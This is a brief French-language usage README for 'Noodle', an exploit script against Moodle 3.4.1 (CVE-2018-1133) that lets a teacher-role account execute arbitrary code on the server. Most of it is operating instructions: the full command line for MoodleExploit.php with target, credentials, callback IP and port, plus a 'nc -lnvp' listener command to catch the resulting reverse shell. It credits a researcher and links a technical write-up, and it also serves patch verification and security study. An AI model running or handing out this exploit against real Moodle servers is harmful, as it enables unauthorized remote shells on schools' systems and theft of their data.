
Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133
Un utilisateur avec le rôle d'enseignant peut exécuter du code arbitraire.
php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1
user Le nom d'utilisateur du compte
pass Le mot de passe du compte
ip Adresse IP de callback
port Port de callback
course ID de cours valide appartenant à l'enseignant
Assurez-vous d'exécuter un listener netcat sur le port spécifié avant d'exécuter ce script.
nc -lnvp 1010
Cela tentera d'ouvrir un shell inverse vers l'IP et le port d'écoute.
Cet exploit est basé sur des informations fournies par Robin Peraglie.
Lecture complémentaire : https://blog.ripstech.com/2018/moodle-remote-code-execution